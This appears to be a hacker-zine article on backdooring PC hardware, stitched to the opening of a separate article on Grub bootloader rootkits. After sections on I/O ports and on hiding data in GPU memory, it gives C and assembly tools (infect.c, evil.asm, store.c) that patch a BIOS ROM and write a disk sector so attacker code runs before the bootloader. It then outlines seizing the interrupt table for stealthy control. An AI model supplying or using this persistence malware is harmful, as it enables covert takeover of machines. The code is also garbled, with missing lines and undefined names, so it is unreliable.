I/O ports : memory-mapped I/O, Input/Output mapped I/O and DMA.
      memory-mapped I/O
   The memory-mapped I/O system allows to manipulate I/O ports as if they
were basic memory. Instructions such as 'mov' are used to interface with
it. This system is simple : all it does is to map I/O ports to memory
addresses so that when data is written/read at one of these addresses, the
data is actually sent to/received by the device connected to the
corresponding port. Thus, the way to communicate with a device is the same
as communicating with memory.
      Input/Output mapped I/O
   The Input/Output mapped I/O system uses dedicated CPU instructions to
access I/O ports. On i386, these instructions are 'in' and 'out' :
       in 254, reg   ; writes content of reg register to port #254
       out reg, 254  ; reads data from port #254 and stores it in reg
    The only problem with these two instructions is that the port is
8 bit-encoded, allowing only an access to ports 0 to 255. The sad thing is
that this range of ports is often connected to internal hardware such as
the system clock. The way to circomvent it is the following (taken from
"The Art of Assembly Programming, see [1]) :
To access I/O ports at addresses beyond 255 you must load the 16-bit I/O
address into the DX register and use DX as a pointer to the specified I/O
address. For example, to write a byte to the I/O address $378 you would use
an instruction sequence like the following:
   mov $378, dx
   out al, dx
     DMA stands for Direct Memory Access. The DMA system is used to enhance
devices to memory performances. Back in the old days, most hardware made
use of the CPU to transfer data to and from memory. When computers started 
to become "multimedia" (a term as meaningless as "people ready" but really 
good looking in "we-are-trying-to-fuck-you-deep-in-the-ass ads"), that is
when computers started to come equiped with CD-ROM and sound cards, CPU
couldn't handle tasks such as playing music while displaying a shotgun
firing at a monster because the user just has hit the 'CTRL' key. So,
constructors created a new chip to be able to carry out such things, and so
was born the DMA controller. DMA allows devices to transfer data from and
to memory with little operations done by the CPU. Basically, all the CPU
does is to initiate the DMA transfer and then the DMA chip takes care of
the rest, allowing the CPU to focus on other tasks. The very interesting
thing is that since the CPU doesn't actually do the transfer and since
devices are being used, protected mode does not interfere, which means we
can write and read (almost) anywhere we would like to. This idea is far
from being new, and PHC already evoqued it in one of their phrack parody.
      DMA is really a powerfull system. It allows us to do very cool
tricks but this come as the expense of a great prize : DMA is a pain in
the ass to use as it is very hardware specific. Here follows the main
different kinds of DMA systems :
      - DMA Controller (third-party DMA) : this DMA system is really old
and inefficient. The idea here is to have a general DMA Controller on the
motherboard that will handle every DMA operations for every devices. This
controller was mainly used with ISA devices and its use is now deprecated
because of performance issues and because only 4 to 8 (depending if the
board had two cascading DMA Controllers) DMA transfers could be setup at
the same time (the DMA Controller only provides 4 channels).
      - DMA Bus mastering (first-party DMA) : this DMA system provides
far better performances than the DMA Controller. The idea is to allow
each device to manage DMA himself by a processus known as "Bus Mastering".
Instead of relying on the general DMA Controller, each device is able to
take control of the system bus to perform its transfers, allowing hardware
manufacturers to provide an efficient system for their devices.
    These three things are practical enough to get started but modern
operating systems provides medias to access I/O too. As there are a lot of
these systems on the computer market, I'll introduce only the GNU/Linux
system, which constitutes a perfect system to discover hardware hacking on
Intel. As many systems, Linux is run in two modes : user land and kernel
land. Since Kernel land already allows a good control on the system, let's
see the user land ways to access I/O. I'll explain here two basic ways to
play with hardware : in*(), out*() and /dev/port :
    The in and out instructions can be used on Linux in user land. Equally,
the functions outb(2), outw(2), outl(2), inb(2), inw(2), inl(2) are
provided to play with I/O and can be called from kernel land or user land.
As stated in "Linux Device Drivers" (see [2]), their use is the following :
    unsigned     inb(unsigned port);
    void   outb(unsigned char byte, unsigned port);
Read or write byte ports (eight bits wide). The port argument is defined as
unsigned long for some platforms and unsigned short for others. The return
type of inb is also different across architectures.
   unsigned      inw(unsigned port);
   void          outw(unsigned short word, unsigned port);
These functions access 16-bit ports (word wide); they are not available
when compiling for the M68k and S390 platforms, which support only byte
   unsigned      inl(unsigned port);
   void          outl(unsigned longword, unsigned port);
These functions access 32-bit ports. longword is either declared as
unsigned long or unsigned int, according to the platform. Like word I/O,
"long" I/O is not available on M68k and S390.
    Note that no 64-bit port I/O operations are defined. Even on 64-bit
architectures, the port address space uses a 32-bit (maximum) data path.
    The only restriction to access I/O ports this way from user land is
that you must use iopl(2) or ioperm(2) functions, which sometimes are
protected by security systems like grsec. And of course, you must be root.
Here is a sample code using this way to access I/O :
** Just a simple code to see how to play with inb()/outb() functions.
** usage is :
**    * read : io r <port address>
**    * write : io w <port address> <value>
** compile with : gcc io.c -o io
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/io.h>   /* iopl(2) inb(2) outb(2) */
void       read_io(long port)
  unsigned int   val;
  val = inb(port);
  fprintf(stdout, "value : %X\n", val);
void       write_io(long port, long value)
  outb(value, port);
int   main(int argc, char **argv)
  long     port;
  if (argc < 3)
      fprintf(stderr, "usage is : io <r|w> <port> [value]\n");
  port = atoi(argv[2]);
  if (iopl(3) == -1)
      fprintf(stderr, "could not get permissions to I/O system\n");
  if (!strcmp(argv[1], "r"))
  else if (!strcmp(argv[1], "w"))
    write_io(port, atoi(argv[3]));
      fprintf(stderr, "usage is : io <r|w> <port> [value]\n");
  return 0;
    /dev/port is a special file that allows you to access I/O as if you
were manipulating a simple file. The use of the functions open(2), read(2),
write(2), lseek(2) and close(2) allows manipulation of /dev/port. Just go
to the address corresponding to the port with lseek() and read() or write()
to the hardware. Here is a sample code to do it :
** Just a simple code to see how to play with /dev/port
** usage is :
**    * read : port r <port address>
**    * write : port w <port address> <value>
** compile with : gcc port.c -o port
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
void       read_port(int fd, long port)
  unsigned int   val = 0;
  lseek(fd, port, SEEK_SET);
  read(fd, &val, sizeof(char));
  fprintf(stdout, "value : %X\n", val);
void       write_port(int fd, long port, long value)
  lseek(fd, port, SEEK_SET);
  write(fd, &value, sizeof(char));
int   main(int argc, char **argv)
  int fd;
  long     port;
  if (argc < 3)
      fprintf(stderr, "usage is : io <r|w> <port> [value]\n");
  port = atoi(argv[2]);
  if ((fd = open("/dev/port", O_RDWR)) == -1)
      fprintf(stderr, "could not open /dev/port\n");
  if (!strcmp(argv[1], "r"))
    read_port(fd, port);
  else if (!strcmp(argv[1], "w"))
    write_port(fd, port, atoi(argv[3]));
      fprintf(stderr, "usage is : io <r|w> <port> [value]\n");
  return 0;
    Ok, one last thing before closing this introduction : for Linux users
who want to list the I/O Ports on their system, just do a
"cat /proc/ioports", ie:
     $ cat /proc/ioports # lists ports from 0000 to FFFF
     0000-001f : dma1
     0020-0021 : pic1
     0040-0043 : timer0
     0050-0053 : timer1
     0060-006f : keyboard
     0080-008f : dma page reg
     00a0-00a1 : pic2
     00c0-00df : dma2
     00f0-00ff : fpu
     0170-0177 : ide1
     01f0-01f7 : ide0
     0213-0213 : ISAPnP
     02f8-02ff : serial
     0376-0376 : ide1
     0378-037a : parport0
     0388-0389 : OPL2/3 (left)
     038a-038b : OPL2/3 (right)
     03c0-03df : vga+
     03f6-03f6 : ide0
     03f8-03ff : serial
     0534-0537 : CS4231
     0a79-0a79 : isapnp write
     0cf8-0cff : PCI conf1
     b800-b8ff : 0000:00:0d.0
       b800-b8ff : 8139too
     d000-d0ff : 0000:00:09.0
       d000-d0ff : 8139too
     d400-d41f : 0000:00:04.2
       d400-d41f : uhci_hcd
     d800-d80f : 0000:00:04.1
       d800-d807 : ide0
       d808-d80f : ide1
     e400-e43f : 0000:00:04.3
       e400-e43f : motherboard
       e400-e403 : PM1a_EVT_BLK
       e404-e405 : PM1a_CNT_BLK
       e408-e40b : PM_TMR
       e40c-e40f : GPE0_BLK
       e410-e415 : ACPI CPU throttle
     e800-e81f : 0000:00:04.3
       e800-e80f : motherboard
         e800-e80f : pnp 00:02
3.  Playing with GPU
     3D cards are just GREAT, period. When you're installing such a card in
your computer, you're not just plugging a device that can render nice
graphics, you're also putting a mini-computer in your own computer. Today's
graphical cards aren't a simple chip anymore. They have memory, they have a
processor, they even have a BIOS ! You can enjoy a LOT of features from
these little things.
     First of all, let's consider what a 3D card really is. 3D cards are
here to enhance your computer performances rendering 3D and to send output
for your screen to display. As I said, there are three parts that interest
us in our 3v1L doings :
       1/ The Video RAM. It is memory embedded on the card. This memory is
used to store the scene to be rendered and to store computed results. Most
of today's cards come with more than 256 MB of memory, which provide us a
nice place to store our stuff.
       2/ The Graphical Processing Unit (shortly GPU). It constitutes the
processor of your 3D card. Most of 3D operations are maths, so most of the
GPU instructions compute maths designed to graphics.
       3/ The BIOS. A lot of devices include today their own BIOS. 3D cards
make no exception, and their little BIOS can be very interesting as they
contain the firmware of your 3D card, and when you access a firmware, well,
you can just nearly do anything you dream to do.
       I'll give ideas about what we can do with these three elements, but
first we need to know how to play with the card. Sadly, as to play with any
device in your computer, you need the specs of your material and most 3D
cards are not open enough to do whatever we want. But this is not a big
problem in itself as we can use a simple API which will talk with the card
for us. Of course, this prevents us to use tricks on the card in certain
conditions, like in a shellcode, but once you've gained root and can do
what pleases you to do on the system it isn't an issue anymore. The API I'm
talking about is OpenGL (see [3]), and if you're not already familiar with
it, I suggest you to read the tutorials on [4]. OpenGL is a 3D programming 
API defined by the OpenGL Architecture Review Board which is composed of
members from many of the industry's leading graphics vendors. This library
often comes with your drivers and by using it, you can develop easily
portable code that will use features of the present 3D card.
       As we now know how to communicate with the card, let's take a deeper
look at this hardware piece. GPU are used to transform a 3D environment
(the "scene") given by the programmer into a 2D image (your screen).
Basically, a GPU is a computing pipeline applying various mathematical
operations on data. I won't introduce here the complete process of
transforming a 3D scene into a 2D display as it is not the point of this
paper. In our case, all you have to know is :
   1/ The GPU is used to transform input (usually a 3D scene but nothing
prevents us from inputing anything else)
   2/ These transformations are done using mathematical operations commonly
used in graphical programming (and again nothing prevents us from using
those operations for another purpose)
   3/ The pipeline is composed of two main computations each involving
multiple steps of data transformation :
       - Transformation and Lighting : this step translates 3D objects
       into 2D nets of polygons (usually triangles), generating a
       wireframe rendering.
       - Rasterization : this step takes the wireframe rendering as input
       data and computes pixels values to be displayed on the screen.
      So now, let's take a look at what we can do with all these features.
What interests us here is to hide data where it would be hard to find it
and to execute instructions outside the processor of the computer. I won't
talk about patching 3D cards firmware as it requires heavy reverse
engineering and as it is very specific for each card, which is not the
subject of this paper.
      First, let's consider instructions execution. Of course, as we are
playing with a 3D card, we can't do everything we can do with a computer
processor like triggering software interrupts, issuing I/O operations or
manipulating memory, but we can do lots of mathematical operations. For
example, we can encrypt and decrypt data with the 3D card's processor
which can render the reverse engineering task quite painful. Also, it can
speed up programs relying on heavy mathematical operations by letting the
computer processor do other things while the 3D card computes for him. Such
things have already been widely done. In fact, some people are already
having fun using GPU for various purposes (see [5]). The idea here is to
use the GPU to transform data we feed him with. GPUs provide a system to
program them called "shaders". You can think of shaders as a programmable
hook within the GPU which allows you to add your own routines in the data
transformation processus. These hooks can be triggered in two places of the
computing pipeline, depending on the shader you're using. Traditionnaly,
shaders are used by programmers to add special effects on the rendering
process and as the rendering process is composed of two steps, the GPU
provides two programmable shaders. The first shader is called the
"Vexter shader". This shader is used during the transformation and lighting
step. The second shader is called the "Pixel shader" and this one is used
during the rasterization processus.
        Ok, so now we have two entry points in the GPU system, but this
doesn't tell us how to develop and inject our own routines. Again, as we
are playing in the hardware world, there are several ways to do it,
depending on the hardware and the system you're running on. Shaders use
their own programming languages, some are low level assembly-like
languages, some others are high level C-like languages. The three main
languages used today are high level ones :
      - High-Level Shader Language (HLSL) : this language is provided by
      Microsoft's DirectX API, so you need MS Windows to use it. (see [6])
      - OpenGL Shading Language (GLSL or GLSlang) : this language is
      provided by the OpenGL API. (see [7])
      - Cg : this language was introduced by NVIDIA to program on their
      hardware using either the DirectX API or the OpenGL one. Cg comes
      with a full toolkit distributed by NVIDIA for free (see [8] and [9]).
    Now that we know how to program GPUs, let's consider the most
interesting part : data hiding. As I said, 3D cards come with a nice
amount of memory. Of course, this memory is aimed at graphical usage but
nothing prevents us to store some stuff in it. In fact, with the help of
shaders we can even ask the 3D card to store and encrypt our data. This is
fairly easy to do : we put the data in the beginning of the pipeline, we
program the shaders to decide how to store and encrypt it and we're done.
Then, retrieving this data is nearly the same operation : we ask the
shaders to decrypt it and to send it back to us. Note that this encryption
is really weak, as we rely only on shaders' computing and as the encryption
and decryption process can be reversed by simply looking at the shaders
programming in your code, but this can constitutes an effective way to
improve already existing tricks (a 3D card based Shiva could be fun).
    Ok, so now we can start coding stuff taking advantage of our 3D cards.
But wait ! We don't want to mess with shaders, we don't want to learn
about 3D programming, we just want to execute code on the device so we can
quickly test what we can do with those devices. Learning shaders
programming is important because it allows to understand the device better
but it can be really long for people unfamiliar with the 3D world.
Recently, nVIDIA released a SDK allowing programmers to easily use 3D
devices for other purposes than graphisms. nVIDIA CUDA (see [10]) is a SDK
allowing programmers to use the C language with new keywords used to tell
the compiler which part of the code should be executed on the device and
which part of the code should be executed on the CPU. CUDA also comes with
various mathematical libraries.
     Here is a funny code to illustrate the use of CUDA :
------[ 3ddb.c
** 3ddb.c : a very simple program used to store an array in
** GPU memory and make the GPU "encrypt" it. Compile it using nvcc.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <cutil.h>
#include <cuda.h>
/*** GPU code and data ***/
char *           store;
__global__ void  encrypt(int key)
  /* do any encryption you want here */
  /* and put the result into 'store' */
  /* (you need to modify CPU code if */
  /* the encrypted text size is      */
  /* different than the clear text   */
  /* one). */
/*** end of GPU code and data ***/
/*** CPU code and data ***/
CUdevice   dev;
void       usage(char * cmd)
  fprintf(stderr, "usage is : %s <string> <key>\n", cmd);
void       init_gpu()
  int      count;
  if (count <= 0)
      fprintf(stderr, "error : could not connect to any 3D card\n");
  CU_SAFE_CALL(cuDeviceGet(&dev, 0));
int        main(int argc, char ** argv)
  int      key;
  char *   res;
  if (argc != 3)
  CUDA_SAFE_CALL(cudaMalloc((void **)&store, strlen(argv[1])));
  res = malloc(strlen(argv[1]));
  key = atoi(argv[2]);
  encrypt<<<128, 256>>>(key);
  for (i = 0; i < strlen(argv[1]); i++)
    printf("%c", res[i]);
  CUT_EXIT(argc, argv);
  return 0;
4.  Playing with BIOS
     BIOSes are very interesting. In fact, little work has already been
done in this area and some stuff has already been published. But let's
recap all this things and take a look at what wonderful tricks we can do
with this little chip. First of all, BIOS means Basic Input/Output System.
This chip is in charge of handling boot process, low-level configuration
and of providing a set of functions for boot loaders and operating systems
during their early loading processus. In fact, at boot time, BIOS takes
control of the system first, then it does a couple of checks, then it sets
an IDT to provide features via interruptions and finally tries to load the
boot loader located in each bootable device, following its configuration.
For example, if you specify in your BIOS setup to first try to boot on
optical drive and then on your harddrive, at boot time the BIOS will first
try to run an OS from the CD, then from your harddrive. BIOSes' code is the
VERY FIRST code to be executed on your system. The interesting thing is
that backdooring it virtually gives us a deep control of the system and a
practical way to bypass nearly any security system running on the target,
since we execute code even before this system starts ! But the inconvenient
of this thing is big : as we are playing with hardware, portability becomes
a really big issue.
     The first thing you need to know about playing with BIOS is that there
are several ways to do it. Some really good publications (see [11]) have
been made on the subject, but I'll focus on what we can do when patching
the ROM containing the BIOS.
      BIOSes are stored in a chip located on your motherboard. Old BIOSes
were  single ROMs without write possibilities, but then some manufacturers
got the brilliant idea to allow BIOS patching. They introduced the BIOS
flasher, which is a little device we can communicate with using the I/O
system. The flasher can read and write the BIOS for us, which is all we
need to play in this land. Of course, as there are many different BIOSes
in the wild, I won't introduce any particular chip. Here are some pointers
that will help you :
      * [12] /dev/bios is a tool from the OpenBIOS initiative (see [13]).
It is a kernel module for Linux that creates devices to easily manipulate
various BIOSes. It can access several BIOSes, including network card
BIOSes. It is a nice tool to play with and the code is nice, so you'll see 
how to get your hands to work.
      * [14] is a WONDERFUL guide that will explain you nearly everything
about Award BIOSes. This paper is a must read for anyone interested in this
subject, even if you don't own an Award BIOS.
      * [15] is an interesting website to find information about various
      In order to start easy and fast, we'll use a virtual machine, which
is very handy to test your concepts before you waste your BIOS. I
recommend you to use Bochs (see [16]) as it is free and open source and
mainly because it comes with a very well commented source code used to
emulate a BIOS. But first, let's see how BIOSes really work.
       As I said, BIOS is the first entity which has the control over your
system at boottime. The interesting thing is, in order to start to reverse
engineer your BIOS, that you don't even need to use the flasher. At the
start of the boot process, BIOS's code is mapped (or "shadowed") in RAM at
a specific location and uses a specific range of memory. All we have to do
to read this code, which is 16 bits assembly, is to read memory. BIOS
memory area starts at 0xf0000 and ends at 0x100000. An easy way to dump
the code is to simply do a :
   % dd if=/dev/mem of=BIOS.dump bs=1 count=65536 seek=983040
   % objdump -b binary -m i8086 -D BIOS.dump
   You should note that as BIOS contains data, such a dump isn't accurate
as you will have a shift preventing code to be disassembled correctly. To
address this problem, you should use the entry points table provided
farther and use objdump with the '--start-address' option.
      Of course, the code you see in memory is rarely easy to retrieve in
the chip, but the fact you got the somewhat "unencrypted text" can help a
lot. To get started to see what is interesting in this code, let's have a
look at a very interesting comment in the Bochs BIOS source code
(from [17]) :
       30 // ROM BIOS compatability entry points:
       31 // ===================================
       32 // $e05b ; POST Entry Point
       33 // $e2c3 ; NMI Handler Entry Point
       34 // $e3fe ; INT 13h Fixed Disk Services Entry Point
       35 // $e401 ; Fixed Disk Parameter Table
       36 // $e6f2 ; INT 19h Boot Load Service Entry Point
       37 // $e6f5 ; Configuration Data Table
       38 // $e729 ; Baud Rate Generator Table
       39 // $e739 ; INT 14h Serial Communications Service Entry Point
       40 // $e82e ; INT 16h Keyboard Service Entry Point
       41 // $e987 ; INT 09h Keyboard Service Entry Point
       42 // $ec59 ; INT 13h Diskette Service Entry Point
       43 // $ef57 ; INT 0Eh Diskette Hardware ISR Entry Point
       44 // $efc7 ; Diskette Controller Parameter Table
       45 // $efd2 ; INT 17h Printer Service Entry Point
       46 // $f045 ; INT 10 Functions 0-Fh Entry Point
       47 // $f065 ; INT 10h Video Support Service Entry Point
       48 // $f0a4 ; MDA/CGA Video Parameter Table (INT 1Dh)
       49 // $f841 ; INT 12h Memory Size Service Entry Point
       50 // $f84d ; INT 11h Equipment List Service Entry Point
       51 // $f859 ; INT 15h System Services Entry Point
       52 // $fa6e ; Character Font for 320x200 & 640x200 Graphics \
       (lower 128 characters)
       53 // $fe6e ; INT 1Ah Time-of-day Service Entry Point
       54 // $fea5 ; INT 08h System Timer ISR Entry Point
       55 // $fef3 ; Initial Interrupt Vector Offsets Loaded by POST
       56 // $ff53 ; IRET Instruction for Dummy Interrupt Handler
       57 // $ff54 ; INT 05h Print Screen Service Entry Point
       58 // $fff0 ; Power-up Entry Point
       59 // $fff5 ; ASCII Date ROM was built - 8 characters in MM/DD/YY
       60 // $fffe ; System Model ID
       These offsets indicate where to find specific BIOS
functionalities in memory and, as they are standard, you can apply them to
your BIOS too. For example, the BIOS interruption 19h is located in memory
at 0xfe6f2 and its job is to load the boot loader in RAM and to jump on it.
On old systems, a little trick was to jump to this memory location to
reboot the system. But before considering BIOS code modification, we have
one issue to resolve : BIOS chips have limited space, and if it can
provide enough space for basic backdoors, we'll end up quickly begging for
more places to store code if we want to do something nice. We have two ways
to get more space :
     1/ We patch the int19h code so that instead of loading the real
bootloader on a device specified, it loads our code (which will load the
real bootloader once it's done) at a specific location, like a sector
marked as defective on a specific hard drive. Of course, this operation
implies alteration of another media than BIOS, but, since it provides us
with as nearly as many space as we could dream, this method must be taken
into consideration
     2/ If you absolutely want to stay in BIOS space, you can do a little
trick on some BIOS models. One day, processors manufacturers made a deal
with BIOS manufacturers. Processor manufacturers decided to give the
possibility to update the CPU's microcode in order to fix bugs without
having to recall all sold material (remember the f00f bug ?). The idea was
that the BIOS would store the updated microcode and inject it in the CPU
during each boot process, as modifications on microcode aren't permanent.
This feature is known as "BIOS update". Of course, this microcode takes
space and we can search for the code injecting it, hook it so it doesn't do
anything anymore and erase the microcode to store our own code.
        Implementing 2/ is more complex than 1/, so we'll focus on the
first one to get started. The idea is to make the BIOS load our own code
before the bootloader. This is very easy to do. Again, BochsBIOS sources
will come in handy, but if you look at your BIOS dump, you should see very
little differences. The code which interests us is located at 0xfe6f2 and
is the 19h BIOS interrupt. This one is very interesting as this is the one
in charge of loading the boot loader. Let's take a look at the interesting 
part of its code :
       7238   // We have to boot from harddisk or floppy
       7239   if (bootcd == 0) {
       7240     bootseg=0x07c0;
       7242 ASM_START
       7243     push bp     
       7244     mov  bp, sp
       7246     mov  ax, #0x0000
       7247     mov  _int19_function.status + 2[bp], ax 
       7248     mov  dl, _int19_function.bootdrv + 2[bp]
       7249     mov  ax, _int19_function.bootseg + 2[bp]
       7250     mov  es, ax         ;; segment          
       7251     mov  bx, #0x0000    ;; offset           
       7252     mov  ah, #0x02      ;; function 2, read diskette sector
       7253     mov  al, #0x01      ;; read 1 sector    
       7254     mov  ch, #0x00      ;; track 0          
       7255     mov  cl, #0x01      ;; sector 1         
       7256     mov  dh, #0x00      ;; head 0
       7257     int  #0x13          ;; read sector
       7258     jnc  int19_load_done
       7259     mov  ax, #0x0001
       7260     mov  _int19_function.status + 2[bp], ax
       7262 int19_load_done:
       7263     pop  bp
       7264 ASM_END
      int13h is the BIOS interruption used to access storage devices. In
our case, BIOS is trying to load the boot loader, which is on the first
sector of the drive. The interesting thing is that by only changing the
value put in one register, we can make the BIOS load our own code. For
instance, if we hide our code in the sector number 0xN and if we patch the
BIOS so that instead of the instruction 'mov cl, #0x01' we have
'mov cl, #0xN', we can have our code loaded at each boot and reboot.
Basically, we can store our code wherever we want to as we can change the
sector, the track and even the drive to be used. It is up to you to chose
where to store your code but as I said, a sector marked as defective can
work out as an interesting trick.
       Here are three source codes to help you get started faster : the
first one, inject.c, modifies the ROM of the BIOS so that it loads our code
before the boot loader. inject.c needs /dev/bios to run. The second one,
code.asm, is a skeletton to fill with your own code and is loaded by the
BIOS. The third one, store.c, inject code.asm in the target sector of the
first track of the hard drive.
--[ infect.c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#define BUFSIZE       512
#define BIOS_DEV "/dev/bios"
#define CODE          "\xbb\x00\x00"  /* mov bx, 0 */ \
                 "\xb4\x02"      /* mov ah, 2 */ \
                 "\xb0\x01"      /* mov al, 1 */ \
                 "\xb5\x00"      /* mov ch, 0 */ \
                 "\xb6\x00"      /* mov dh, 0 */ \
                 "\xb1\x01"      /* mov cl, 1 */ \
                 "\xcd\x13"      /* int 0x13 */
#define TO_PATCH "\xcd\x13"        /* mov cl, 1 */
void  usage(char *cmd)
  fprintf(stderr, "usage is : %s [bios rom] <sector> <infected rom>\n", cmd);
** This function looks in the BIOS rom and search the int19h procedure.
** The algorithm used sucks, as it does only a naive search. Interested
** readers should change it.
char *     search(char * buf, size_t size)
  return memmem(buf, size, CODE, sizeof(CODE));
void  patch(char * tgt, size_t size, int sector)
  char           new;
  char *   tmp;
  tmp = memmem(tgt, size, TO_PATCH, sizeof(TO_PATCH));
  new = (char)sector;
  tmp[SECTOR_OFFSET] = new;
int        main(int argc, char **argv)
  int      sector;
  size_t   i;
  size_t   ret;
  size_t         cnt;
  int      devfd;
  int      outfd;
  char *   buf;
  char *   dev;
  char *   out;
  char *   tgt;
  if (argc == 3)
      dev = BIOS_DEV;
      out = argv[2];
      sector = atoi(argv[1]);
  else if (argc == 4)
      dev = argv[1];
      out = argv[3];
      sector = atoi(argv[2]);
  if ((devfd = open(dev, O_RDONLY)) == -1)
      fprintf(stderr, "could not open BIOS\n");
  if ((outfd = open(out, O_WRONLY | O_TRUNC | O_CREAT)) == -1)
      fprintf(stderr, "could not open %s\n", out);
  for (cnt = 0; (ret = read(devfd, buf, BUFSIZE)) > 0; cnt += ret)
    buf = realloc(buf, ((cnt + ret) / BUFSIZE + 1) * BUFSIZE);
  if (ret == -1)
      fprintf(stderr, "error reading BIOS\n");
  if ((tgt = search(buf, cnt)) == NULL)
      fprintf(stderr, "could not find code to patch\n");
  patch(tgt, cnt, sector);
  for (i = 0; (ret = write(outfd, buf + i, cnt - i)) > 0; i += ret)
  if (ret == -1)
      fprintf(stderr, "could not write patched ROM to disk\n");
  return 0;
--[ evil.asm
;;; A sample code to be loaded by an infected BIOS instead of
;;; the real bootloader. It basically moves himself so he can
;;; load the real bootloader and jump on it. Replace the nops
;;; if you want him to do something usefull.
;;; usage is :
;;;        no usage, this code must be loaded by store.c
;;; compile with : nasm -fbin evil.asm -o evil.bin
BITS  16               
ORG   0                
;; we need this label so we can check the code size
      jmp   begin      ; jump over data
;; here comes data
drive db    0          ; drive we're working on
      mov   [drive], dl      ; get the drive we're working on
      ;; segments init
      mov   ax, 0x07C0
      mov   ds, ax
      mov   es, ax
      ;; stack init
      mov   ax, 0
      mov   ss, ax
      mov   ax, 0xffff
      mov   sp, ax
      ;; move out of the zone so we can load the TRUE boot loader
      mov   ax, 0x7c0
      mov   ds, ax
      mov   ax, 0x100
      mov   es, ax
      mov   si, 0
      mov   di, 0
      mov   cx, 0x200
      rep   movsb
      ;; jump to our new location
      jmp   0x100:next
next:                 ;; to jump to the new location
      ;; load the true boot loader
      mov   dl, [drive]
      mov   ax, 0x07C0
      mov   es, ax
      mov   bx, 0
      mov   ah, 2
      mov   al, 1
      mov   ch, 0
      mov   cl, 1
      mov   dh, 0
      int   0x13
      ;; do your evil stuff there (ie : infect the boot loader)
      ;; execute system
      jmp   07C0h:0
size    equ     $ - entry
%if size+2 > 512
      %error "code is too large for boot sector"
times   (512 - size - 2) db 0    ; fill 512 bytes
db      0x55, 0xAA          ; boot signature
--[ store.c
** code to be used to store a fake bootloader loaded by an infected BIOS
** usage is :
**         store <device to store on> <sector number> <file to inject>
** compile with : gcc store.c -o store
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#define CODE_SIZE     512
#define SECTOR_SIZE   512
void  usage(char *cmd)
  fprintf(stderr, "usage is : %s <device> <sector> <code>", cmd);
int   main(int argc, char **argv)
  int off;
  int   i;
  int   devfd;
  int codefd;
  int   cnt; 
  char  code[CODE_SIZE];
  if (argc != 4)
  if ((devfd = open(argv[1], O_RDONLY)) == -1)
      fprintf(stderr, "error : could not open device\n");
  off = atoi(argv[2]);
  if ((codefd = open(argv[3], O_RDONLY)) == -1)
      fprintf(stderr, "error : could not open code file\n");
  for (cnt = 0; cnt != CODE_SIZE; cnt += i)
    if ((i = read(codefd, &(mbr[cnt]), CODE_SIZE - cnt)) <= 0) 
      fprintf(stderr, "error reading code\n");
  lseek(devfd, (off - 1) * SECTOR_SIZE, SEEK_SET);
  for (cnt = 0; cnt != CODE_SIZE; cnt += i)
    if ((i = write(devfd, &(mbr[cnt]), CODE_SIZE - cnt)) <= 0) 
      fprintf(stderr, "error reading code\n");
  printf("Device infected\n");
  return 0;                         
      Okay, now that we can load our code using the BIOS, time has come
to consider what we can do in this position. As we are nearly the first one
to have control over the system, we can do really interesting things.
      First, we can hijack BIOS interruptions and make them jump to
our code. This is interesting because instead of writing all the code in
the BIOS, we can now hijack BIOS routines having as much space as we need
and without having to do a lot of reverse engineering.
      Next, we can easily patch the boot loader on-thy-fly as it is our
own code which loads it. In fact, we don't even have to call the true
boot loader if we don't want to, we can make a fake one that loads a nicely
patched kernel based on the real one. Or you can make a fake boot loader
(or even patch the real one on-the-fly) that loads the real kernel and
patch it on the fly. The choice is up to you.
        Finally, I would talk about one last thing that came on my mind.
Combined with IDTR hijacking, patching the BIOS can assure us a complete
control of the system. We can patch the BIOS so that it loads our own boot
loader. This boot loader is a special one, in fact it loads a mini-OS of
our own which sets an IDT. Then, as we hijacked the IDTR register (there
are several ways to do it, the easiest being patching the target OS boot
process in order to prevent him to erase our IDT), we can then load the
true boot loader which will load the true kernel. At this time, our own os
will hijack the entire system with its own IDT proxying any interrupt you
want to, hijacking any event on the system. We even can use the system
clock as a scheduler forthe two OS : the tick will be caught by our own 
OS and depending the configuration (we can say for example 10% of the time 
for our OS and 90% for the real OS), we can execute our code or give the 
control to the real OS by jumping on its IDT.
       You can do lot of things simply by patching the BIOS, so I suggest
you to implement your own ideas. Remember this is not so difficult,
documentation about this subject already exists and we can really do lots
of things. Just remember to use Bochs for tests before going in the wild,
it certainly isn't fun when smoke comes out of one of the motherboard's
5.  Conclusion
     So that's it, hardware can be backdoored quite easily. Of course,
what I demonstrated here was just a fast overview. We can do LOTS of things
with hardware, things that can assure us a total control of the computer
we're on and remain stealth. There is a huge work to do in this area as
more and more devices become CPU independent and implement many features
that can be used to do funny things. Imagination (and portability, sic...)
are the only limits.
   For people very interested in having fun in the hardware world, I
suggest to take a look at CPU microcode programming system
(start with the AMD K8 reverse engineering, see [18]), network cards
BIOSes and the PXE system.

Hacking Grub for fun and profit



    0.0 - Trojan/backdoor/rootkit review


    1.0 - Boot process with Grub

        1.1 How does Grub work ?

        1.2 stage1

        1.3 stage1.5 & stage2

        1.4 Grub util


    2.0 - Possibility to load specified file


    3.0 - Hacking techniques

        3.1 How to load file_fake

        3.2 How to locate ext2fs_dir

        3.3 How to hack grub

        3.4 How to make things sneaky


    4.0 - Usage


    5.0 - Detection


    6.0 - At the end


    7.0 - Ref


    8.0 - hack_grub.tar.gz


--[ 0.0 - Trojan/backdoor/rootkits review


    Since 1989 when the first log-editing tool appeared(Phrack 0x19 #6 -

Hiding out under Unix), the trojan/backdoor/rootkit have evolved greatly.

From the early user-mode tools such as LRK4/5, to kernel-mode ones such as

knark/adore/adore-ng, then appears SuckIT, module-injection, nowadays even

static kernel-patching.

    Think carefully, what remains untouched? Yes, that's bootloader. 

    So, in this paper, I present a way to make Grub follow your order, that

is, it can load another kernel/initrd image/grub.conf despite the file you

specify in grub.conf.


P.S.: This paper is based on Linux and EXT2/3 under x86 system.


--[ 1.0 - Boot process with Grub


----[ 1.1 - How does Grub work ?



                       | boot,load |

                       |    MBR    |



                     +----------------+     NO

                     | Grub is in MBR +------->-------+

                     +-------+--------+               |

                        Yes  |  stage1        +-------+--------+

               Yes  +--------+---------+      | jump to active |

             +--<---+ stage1.5 config? |      |    partition   |

